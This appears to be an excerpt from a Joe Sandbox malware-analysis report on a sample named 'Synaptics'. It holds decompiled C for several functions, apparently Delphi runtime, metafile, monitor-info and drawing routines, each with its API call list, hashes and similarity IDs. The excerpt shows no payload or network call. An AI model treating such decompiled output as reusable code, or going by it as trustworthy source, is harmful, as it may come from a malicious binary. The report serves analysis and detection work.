                                                                                                                                                                                                                            				if(_v38 != 0x9ac6cdd7 || E00426DA8( &_v38) != _v18) {
                                                                                                                                                                                                                            					E00425F58();
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_v12 = _v12 - 0x16;
                                                                                                                                                                                                                            				_v16 = E0040275C(_v12);
                                                                                                                                                                                                                            				_t103 =  *((intOrPtr*)(_t122 + 0x28));
                                                                                                                                                                                                                            				 *[fs:eax] = _t126;
                                                                                                                                                                                                                            				 *((intOrPtr*)( *_v8 + 0xc))( *[fs:eax], 0x42846f, _t124);
                                                                                                                                                                                                                            				 *((short*)( *((intOrPtr*)(_t122 + 0x28)) + 0x18)) = _v24;
                                                                                                                                                                                                                            				if(_v24 == 0) {
                                                                                                                                                                                                                            					_v24 = 0x60;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t103 + 0xc)) = MulDiv(_v28 - _v32, 0x9ec, _v24 & 0x0000ffff);
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t103 + 0x10)) = MulDiv(_v26 - _v30, 0x9ec, _v24 & 0x0000ffff);
                                                                                                                                                                                                                            				_v54.mm = 8;
                                                                                                                                                                                                                            				_v54.xExt = 0;
                                                                                                                                                                                                                            				_v54.yExt = 0;
                                                                                                                                                                                                                            				_v54.hMF = 0;
                                                                                                                                                                                                                            				_t119 = SetWinMetaFileBits(_v12, _v16, 0,  &_v54);
                                                                                                                                                                                                                            				 *(_t103 + 8) = _t119;
                                                                                                                                                                                                                            				if(_t119 == 0) {
                                                                                                                                                                                                                            					E00425F58();
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				GetEnhMetaFileHeader( *(_t103 + 8), "true",  &_v154);
                                                                                                                                                                                                                            				_v54.mm = 8;
                                                                                                                                                                                                                            				_v54.xExt = _v122;
                                                                                                                                                                                                                            				_v54.yExt = _v118;
                                                                                                                                                                                                                            				_v54.hMF = 0;
                                                                                                                                                                                                                            				DeleteEnhMetaFile( *(_t103 + 8));
                                                                                                                                                                                                                            				_t120 = SetWinMetaFileBits(_v12, _v16, 0,  &_v54);
                                                                                                                                                                                                                            				 *(_t103 + 8) = _t120;
                                                                                                                                                                                                                            				if(_t120 == 0) {
                                                                                                                                                                                                                            					E00425F58();
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				 *((char*)(_t122 + 0x2c)) = 0;
                                                                                                                                                                                                                            				_pop(_t115);
                                                                                                                                                                                                                            				 *[fs:eax] = _t115;
                                                                                                                                                                                                                            				_push(0x428476);
                                                                                                                                                                                                                            				return E0040277C(_v16);
                                                                                                                                                                                                                            			}



























                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • MulDiv.KERNEL32(?,000009EC,00000000), ref: 004283A2
                                                                                                                                                                                                                            • MulDiv.KERNEL32(?,000009EC,00000000), ref: 004283BF
                                                                                                                                                                                                                            • SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC,00000000), ref: 004283EB
                                                                                                                                                                                                                            • GetEnhMetaFileHeader.GDI32(00000016,?,?,00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC,00000000), ref: 0042840B
                                                                                                                                                                                                                            • DeleteEnhMetaFile.GDI32(00000016), ref: 0042842C
                                                                                                                                                                                                                            • SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008,00000016,?,?,00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC), ref: 0042843F
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FileMeta$Bits$DeleteHeader
                                                                                                                                                                                                                            • String ID: `
                                                                                                                                                                                                                            • API String ID: 1990453761-2679148245
                                                                                                                                                                                                                            • Opcode ID: 0c01fd69f92b0b42f0212475d03f564d72d5169141e12a16344919336c70851a
                                                                                                                                                                                                                            • Instruction ID: d131a5009b9ae6a1c3985c7f4bbb4479256416dcbb727d86a178af25fe9cd39a
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0c01fd69f92b0b42f0212475d03f564d72d5169141e12a16344919336c70851a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B7410F75E00218AFDB00DFA9D485AAEB7F9EF48710F50846AF904F7281E7799D40CB69
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 67%
                                                                                                                                                                                                                            			E0042C82C(struct HMONITOR__* _a4, struct tagMONITORINFO* _a8) {
                                                                                                                                                                                                                            				void _v20;
                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                                                                            				void* _t23;
                                                                                                                                                                                                                            				int _t24;
                                                                                                                                                                                                                            				struct HMONITOR__* _t27;
                                                                                                                                                                                                                            				struct tagMONITORINFO* _t29;
                                                                                                                                                                                                                            				intOrPtr* _t31;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t29 = _a8;
                                                                                                                                                                                                                            				_t27 = _a4;
                                                                                                                                                                                                                            				if( *0x49e92c != 0) {
                                                                                                                                                                                                                            					_t24 = 0;
                                                                                                                                                                                                                            					if(_t27 == 0x12340042 && _t29 != 0 && _t29->cbSize >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
                                                                                                                                                                                                                            						_t29->rcMonitor.left = 0;
                                                                                                                                                                                                                            						_t29->rcMonitor.top = 0;
                                                                                                                                                                                                                            						_t29->rcMonitor.right = GetSystemMetrics(0);
                                                                                                                                                                                                                            						_t29->rcMonitor.bottom = GetSystemMetrics(1);
                                                                                                                                                                                                                            						asm("movsd");
                                                                                                                                                                                                                            						asm("movsd");
                                                                                                                                                                                                                            						asm("movsd");
                                                                                                                                                                                                                            						asm("movsd");
                                                                                                                                                                                                                            						_t31 = _t29;
                                                                                                                                                                                                                            						 *(_t31 + 0x24) = 1;
                                                                                                                                                                                                                            						if( *_t31 >= 0x4c) {
                                                                                                                                                                                                                            							_push("DISPLAY");
                                                                                                                                                                                                                            							_push(_t31 + 0x28);
                                                                                                                                                                                                                            							L00407298();
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_t24 = 1;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					 *0x49e910 = E0042C4FC(4, _t23,  *0x49e910, _t27, _t29);
                                                                                                                                                                                                                            					_t24 = GetMonitorInfoA(_t27, _t29);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return _t24;
                                                                                                                                                                                                                            			}














                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetMonitorInfoA.USER32(?,?), ref: 0042C85D
                                                                                                                                                                                                                            • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0042C884
                                                                                                                                                                                                                            • GetSystemMetrics.USER32 ref: 0042C899
                                                                                                                                                                                                                            • GetSystemMetrics.USER32 ref: 0042C8A4
                                                                                                                                                                                                                            • lstrcpy.KERNEL32(?,DISPLAY), ref: 0042C8CE
                                                                                                                                                                                                                              • Part of subcall function 0042C4FC: GetProcAddress.KERNEL32(74690000,00000000), ref: 0042C57C
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: System$InfoMetrics$AddressMonitorParametersProclstrcpy
                                                                                                                                                                                                                            • String ID: DISPLAY$GetMonitorInfo
                                                                                                                                                                                                                            • API String ID: 1539801207-1633989206
                                                                                                                                                                                                                            • Opcode ID: fa4bae191739b45e5aec941b0add0c014022072654a4bc21e87a1519e8d0f9cd
                                                                                                                                                                                                                            • Instruction ID: fd539ca8d8add89cf6c2a40af9093eb6b2d142832e41177ff4ac11c4fa6a4bef
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fa4bae191739b45e5aec941b0add0c014022072654a4bc21e87a1519e8d0f9cd
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3211E4B17013109FD720EF66AC84BABB7E9EB05712F40893BE815D7240D3B5A900CBA9
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00406B91(void* __eax, void* __ebx, void* __ecx, intOrPtr* __edi) {
                                                                                                                                                                                                                            				long _t11;
                                                                                                                                                                                                                            				void* _t16;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t16 = __ebx;
                                                                                                                                                                                                                            				 *__edi =  *__edi + __ecx;
                                                                                                                                                                                                                            				 *((intOrPtr*)(__eax - 0x49e5bc)) =  *((intOrPtr*)(__eax - 0x49e5bc)) + __eax - 0x49e5bc;
                                                                                                                                                                                                                            				 *0x49b00c = 2;
                                                                                                                                                                                                                            				 *0x49e014 = 0x40124c;
                                                                                                                                                                                                                            				 *0x49e018 = 0x40125c;
                                                                                                                                                                                                                            				 *0x49e04e = 2;
                                                                                                                                                                                                                            				 *0x49e000 = E00405998;
                                                                                                                                                                                                                            				if(E00403A2C() != 0) {
                                                                                                                                                                                                                            					_t3 = E00403A5C();
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				E00403B20(_t3);
                                                                                                                                                                                                                            				 *0x49e054 = 0xd7b0;
                                                                                                                                                                                                                            				 *0x49e220 = 0xd7b0;
                                                                                                                                                                                                                            				 *0x49e3ec = 0xd7b0;
                                                                                                                                                                                                                            				 *0x49e040 = GetCommandLineA();
                                                                                                                                                                                                                            				 *0x49e03c = E004013AC();
                                                                                                                                                                                                                            				if((GetVersion() & 0x80000000) == 0x80000000) {
                                                                                                                                                                                                                            					 *0x49e5c0 = E00406AC8(GetThreadLocale(), _t16, __eflags);
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					if((GetVersion() & 0x000000ff) <= 4) {
                                                                                                                                                                                                                            						 *0x49e5c0 = E00406AC8(GetThreadLocale(), _t16, __eflags);
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						 *0x49e5c0 = 3;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t11 = GetCurrentThreadId();
                                                                                                                                                                                                                            				 *0x49e034 = _t11;
                                                                                                                                                                                                                            				return _t11;
                                                                                                                                                                                                                            			}






                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 00403A2C: GetKeyboardType.USER32(00000000), ref: 00403A31
                                                                                                                                                                                                                              • Part of subcall function 00403A2C: GetKeyboardType.USER32(00000001), ref: 00403A3D
                                                                                                                                                                                                                            • GetCommandLineA.KERNEL32 ref: 00406BF7
                                                                                                                                                                                                                            • GetVersion.KERNEL32 ref: 00406C0B
                                                                                                                                                                                                                            • GetVersion.KERNEL32 ref: 00406C1C
                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00406C58
                                                                                                                                                                                                                              • Part of subcall function 00403A5C: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403A7E
                                                                                                                                                                                                                              • Part of subcall function 00403A5C: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00403ACD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403AB1
                                                                                                                                                                                                                              • Part of subcall function 00403A5C: RegCloseKey.ADVAPI32(?,00403AD4,00000000,?,00000004,00000000,00403ACD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403AC7
                                                                                                                                                                                                                            • GetThreadLocale.KERNEL32 ref: 00406C38
                                                                                                                                                                                                                              • Part of subcall function 00406AC8: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00406B2E), ref: 00406AEE
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: KeyboardLocaleThreadTypeVersion$CloseCommandCurrentInfoLineOpenQueryValue
                                                                                                                                                                                                                            • String ID: p4c
                                                                                                                                                                                                                            • API String ID: 3734044017-3290526295
                                                                                                                                                                                                                            • Opcode ID: 80c40a3011654aafb83b82008dee8090efd0972bd8c4411161df1e54b8dfc797
                                                                                                                                                                                                                            • Instruction ID: fdcee0d7d708edd62114d02ed336596d20e14c9a9bb73fcb5a3f4b26375a27c1
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 80c40a3011654aafb83b82008dee8090efd0972bd8c4411161df1e54b8dfc797
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 52016DB4414351CAE710FFA7A8063583AA0AB2131DF05583FD541BA2F2FBBC01158B6E
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 79%
                                                                                                                                                                                                                            			E004047C0(void* __ecx) {
                                                                                                                                                                                                                            				long _v4;
                                                                                                                                                                                                                            				int _t3;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				if( *0x49e04c == 0) {
                                                                                                                                                                                                                            					if( *0x49b034 == 0) {
                                                                                                                                                                                                                            						_t3 = MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					return _t3;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					if( *0x49e220 == 0xd7b2 &&  *0x49e228 > 0) {
                                                                                                                                                                                                                            						 *0x49e238();
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1e,  &_v4, 0);
                                                                                                                                                                                                                            					return WriteFile(GetStdHandle(0xfffffff5), E00404848, 2,  &_v4, 0);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}






                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,0049ABAD,00000000,?,0040488E,?,?,?,00000002,0040492E,0040286B,004028B3,Synaptics,00000000), ref: 004047F9
                                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,0049ABAD,00000000,?,0040488E,?,?,?,00000002,0040492E,0040286B,004028B3,Synaptics), ref: 004047FF
                                                                                                                                                                                                                            • GetStdHandle.KERNEL32(000000F5,00404848,00000002,0049ABAD,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,0049ABAD,00000000,?,0040488E), ref: 00404814
                                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,000000F5,00404848,00000002,0049ABAD,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,0049ABAD,00000000,?,0040488E), ref: 0040481A
                                                                                                                                                                                                                            • MessageBoxA.USER32 ref: 00404838
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FileHandleWrite$Message
                                                                                                                                                                                                                            • String ID: Error$Runtime error at 00000000
                                                                                                                                                                                                                            • API String ID: 1570097196-2970929446
                                                                                                                                                                                                                            • Opcode ID: 1dcbe707f156ef72c6b32e8e434cf4761e4d92a63b110f457c2787cb3198cc4d
                                                                                                                                                                                                                            • Instruction ID: d031fbb1000275bb1cbc2334fc3dd0bc9fcf369acb127de660da951a48ee9705
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1dcbe707f156ef72c6b32e8e434cf4761e4d92a63b110f457c2787cb3198cc4d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F9F096D564038075FE20B3626E07F5B255C8794B19F244ABFB320B50E297BC54C0865D
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 39%
                                                                                                                                                                                                                            			E00448030(void* __eax, intOrPtr __ecx, intOrPtr __edx, void* __eflags, char _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                                                                                            				char _v28;
                                                                                                                                                                                                                            				char _v44;
                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                                                                            				void* _t46;
                                                                                                                                                                                                                            				void* _t57;
                                                                                                                                                                                                                            				intOrPtr _t85;
                                                                                                                                                                                                                            				intOrPtr _t96;
                                                                                                                                                                                                                            				void* _t117;
                                                                                                                                                                                                                            				void* _t118;
                                                                                                                                                                                                                            				void* _t127;
                                                                                                                                                                                                                            				struct HDC__* _t136;
                                                                                                                                                                                                                            				struct HDC__* _t137;
                                                                                                                                                                                                                            				intOrPtr* _t138;
                                                                                                                                                                                                                            				void* _t139;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t119 = __ecx;
                                                                                                                                                                                                                            				_t135 = __ecx;
                                                                                                                                                                                                                            				_v8 = __edx;
                                                                                                                                                                                                                            				_t118 = __eax;
                                                                                                                                                                                                                            				_t46 = E00447BD0(__eax);
                                                                                                                                                                                                                            				if(_t46 != 0) {
                                                                                                                                                                                                                            					_t142 = _a4;
                                                                                                                                                                                                                            					if(_a4 == 0) {
                                                                                                                                                                                                                            						__eflags =  *((intOrPtr*)(_t118 + 0x54));
                                                                                                                                                                                                                            						if( *((intOrPtr*)(_t118 + 0x54)) == 0) {
                                                                                                                                                                                                                            							_t138 = E00429914(1);
                                                                                                                                                                                                                            							 *((intOrPtr*)(_t118 + 0x54)) = _t138;
                                                                                                                                                                                                                            							E0042AD38(_t138, 1);
                                                                                                                                                                                                                            							 *((intOrPtr*)( *_t138 + 0x40))();
                                                                                                                                                                                                                            							_t119 =  *_t138;
                                                                                                                                                                                                                            							 *((intOrPtr*)( *_t138 + 0x34))();
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						E004255DC( *((intOrPtr*)(E00429EDC( *((intOrPtr*)(_t118 + 0x54))) + 0x14)), _t119, 0xffffff, _t135, _t139, __eflags);
                                                                                                                                                                                                                            						E00419804(0,  *((intOrPtr*)(_t118 + 0x34)), 0,  &_v44,  *((intOrPtr*)(_t118 + 0x30)));
                                                                                                                                                                                                                            						_push( &_v44);
                                                                                                                                                                                                                            						_t57 = E00429EDC( *((intOrPtr*)(_t118 + 0x54)));
                                                                                                                                                                                                                            						_pop(_t127);
                                                                                                                                                                                                                            						E00425980(_t57, _t127);
                                                                                                                                                                                                                            						_push(0);
                                                                                                                                                                                                                            						_push(0);
                                                                                                                                                                                                                            						_push(0xffffffff);
                                                                                                                                                                                                                            						_push(0);
                                                                                                                                                                                                                            						_push(0);
                                                                                                                                                                                                                            						_push(0);
                                                                                                                                                                                                                            						_push(0);
                                                                                                                                                                                                                            						_push(E00425C68(E00429EDC( *((intOrPtr*)(_t118 + 0x54)))));
                                                                                                                                                                                                                            						_push(_v8);
                                                                                                                                                                                                                            						_push(E00447D0C(_t118));
                                                                                                                                                                                                                            						L0042C454();
                                                                                                                                                                                                                            						E00419804(_a16, _a16 +  *((intOrPtr*)(_t118 + 0x34)), _a12,  &_v28, _a12 +  *((intOrPtr*)(_t118 + 0x30)));
                                                                                                                                                                                                                            						_v12 = E00425C68(E00429EDC( *((intOrPtr*)(_t118 + 0x54))));
                                                                                                                                                                                                                            						E004255DC( *((intOrPtr*)(_t135 + 0x14)), _a16 +  *((intOrPtr*)(_t118 + 0x34)), 0xff000014, _t135, _t139, __eflags);
                                                                                                                                                                                                                            						_t136 = E00425C68(_t135);
                                                                                                                                                                                                                            						SetTextColor(_t136, 0xffffff);
                                                                                                                                                                                                                            						SetBkColor(_t136, 0);
                                                                                                                                                                                                                            						_push(0xe20746);
                                                                                                                                                                                                                            						_push(0);
                                                                                                                                                                                                                            						_push(0);
                                                                                                                                                                                                                            						_push(_v12);
                                                                                                                                                                                                                            						_push( *((intOrPtr*)(_t118 + 0x30)));
                                                                                                                                                                                                                            						_push( *((intOrPtr*)(_t118 + 0x34)));
                                                                                                                                                                                                                            						_push(_a12 + 1);
                                                                                                                                                                                                                            						_t85 = _a16 + 1;
                                                                                                                                                                                                                            						__eflags = _t85;
                                                                                                                                                                                                                            						_push(_t85);
                                                                                                                                                                                                                            						_push(_t136);
                                                                                                                                                                                                                            						L004072B8();
                                                                                                                                                                                                                            						E004255DC( *((intOrPtr*)(_t135 + 0x14)), _a16 +  *((intOrPtr*)(_t118 + 0x34)), 0xff000010, _t135, _t139, _t85);
                                                                                                                                                                                                                            						_t137 = E00425C68(_t135);
                                                                                                                                                                                                                            						SetTextColor(_t137, 0xffffff);
                                                                                                                                                                                                                            						SetBkColor(_t137, 0);
                                                                                                                                                                                                                            						_push(0xe20746);
                                                                                                                                                                                                                            						_push(0);
                                                                                                                                                                                                                            						_push(0);
                                                                                                                                                                                                                            						_push(_v12);
                                                                                                                                                                                                                            						_push( *((intOrPtr*)(_t118 + 0x30)));
                                                                                                                                                                                                                            						_push( *((intOrPtr*)(_t118 + 0x34)));
                                                                                                                                                                                                                            						_push(_a12);
                                                                                                                                                                                                                            						_t96 = _a16;
                                                                                                                                                                                                                            						_push(_t96);
                                                                                                                                                                                                                            						_push(_t137);
                                                                                                                                                                                                                            						L004072B8();
                                                                                                                                                                                                                            						return _t96;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_push(_a8);
                                                                                                                                                                                                                            					_push(E00447A20(_t142));
                                                                                                                                                                                                                            					E00448008(_t118, _t142);
                                                                                                                                                                                                                            					_push(E00447A20(_t142));
                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                            					_push(_a12);
                                                                                                                                                                                                                            					_push(_a16);
                                                                                                                                                                                                                            					_push(E00425C68(__ecx));
                                                                                                                                                                                                                            					_push(_v8);
                                                                                                                                                                                                                            					_t117 = E00447D0C(_t118);
                                                                                                                                                                                                                            					_push(_t117);
                                                                                                                                                                                                                            					L0042C454();
                                                                                                                                                                                                                            					return _t117;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return _t46;
                                                                                                                                                                                                                            			}




















                                                                                                                                                                                                                            0x004480fd
                                                                                                                                                                                                                            0x00448102
                                                                                                                                                                                                                            0x00448103
                                                                                                                                                                                                                            0x00448108
                                                                                                                                                                                                                            0x0044810a
                                                                                                                                                                                                                            0x0044810c
                                                                                                                                                                                                                            0x0044810e
                                                                                                                                                                                                                            0x00448110
                                                                                                                                                                                                                            0x00448112
                                                                                                                                                                                                                            0x00448114
                                                                                                                                                                                                                            0x00448123
                                                                                                                                                                                                                            0x00448127
                                                                                                                                                                                                                            0x0044812f
                                                                                                                                                                                                                            0x00448130
                                                                                                                                                                                                                            0x0044814c
                                                                                                                                                                                                                            0x0044815e
                                                                                                                                                                                                                            0x00448169
                                                                                                                                                                                                                            0x00448175
                                                                                                                                                                                                                            0x0044817d
                                                                                                                                                                                                                            0x00448185
                                                                                                                                                                                                                            0x0044818a
                                                                                                                                                                                                                            0x0044818f
                                                                                                                                                                                                                            0x00448191
                                                                                                                                                                                                                            0x00448196
                                                                                                                                                                                                                            0x0044819a
                                                                                                                                                                                                                            0x0044819e
                                                                                                                                                                                                                            0x004481a3
                                                                                                                                                                                                                            0x004481a7
                                                                                                                                                                                                                            0x004481a7
                                                                                                                                                                                                                            0x004481a8
                                                                                                                                                                                                                            0x004481a9
                                                                                                                                                                                                                            0x004481aa
                                                                                                                                                                                                                            0x004481b7
                                                                                                                                                                                                                            0x004481c3
                                                                                                                                                                                                                            0x004481cb
                                                                                                                                                                                                                            0x004481d3
                                                                                                                                                                                                                            0x004481d8
                                                                                                                                                                                                                            0x004481dd
                                                                                                                                                                                                                            0x004481df
                                                                                                                                                                                                                            0x004481e4
                                                                                                                                                                                                                            0x004481e8
                                                                                                                                                                                                                            0x004481ec
                                                                                                                                                                                                                            0x004481f0
                                                                                                                                                                                                                            0x004481f1
                                                                                                                                                                                                                            0x004481f4
                                                                                                                                                                                                                            0x004481f5
                                                                                                                                                                                                                            0x004481f6
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004481f6
                                                                                                                                                                                                                            0x00448058
                                                                                                                                                                                                                            0x00448061
                                                                                                                                                                                                                            0x00448064
                                                                                                                                                                                                                            0x0044806e
                                                                                                                                                                                                                            0x0044806f
                                                                                                                                                                                                                            0x00448071
                                                                                                                                                                                                                            0x00448076
                                                                                                                                                                                                                            0x0044807a
                                                                                                                                                                                                                            0x00448082
                                                                                                                                                                                                                            0x00448086
                                                                                                                                                                                                                            0x00448089
                                                                                                                                                                                                                            0x0044808e
                                                                                                                                                                                                                            0x0044808f
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044808f
                                                                                                                                                                                                                            0x00448201

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • 73752430.COMCTL32(00000000,?,00000000,?,?,00000000,00000000,00000000,00000000,?), ref: 0044808F
                                                                                                                                                                                                                            • 73752430.COMCTL32(00000000,?,00000000,00000000,00000000,00000000,00000000,000000FF,00000000,00000000), ref: 00448130
                                                                                                                                                                                                                            • SetTextColor.GDI32(00000000,00FFFFFF), ref: 0044817D
                                                                                                                                                                                                                            • SetBkColor.GDI32(00000000,00000000), ref: 00448185
                                                                                                                                                                                                                            • 73CA97E0.GDI32(00000000,?,?,?,?,00000000,00000000,00000000,00E20746,00000000,00000000,00000000,00FFFFFF,00000000,?,00000000), ref: 004481AA
                                                                                                                                                                                                                              • Part of subcall function 00448008: 73752240.COMCTL32(00000000,?,00448069,00000000,?), ref: 0044801E
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: 73752430Color$73752240Text
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1345666146-0
                                                                                                                                                                                                                            • Opcode ID: ab44610fbabe63d1efb5402cb7d40d97d5a42581b57647a3f1f398fe194eb632
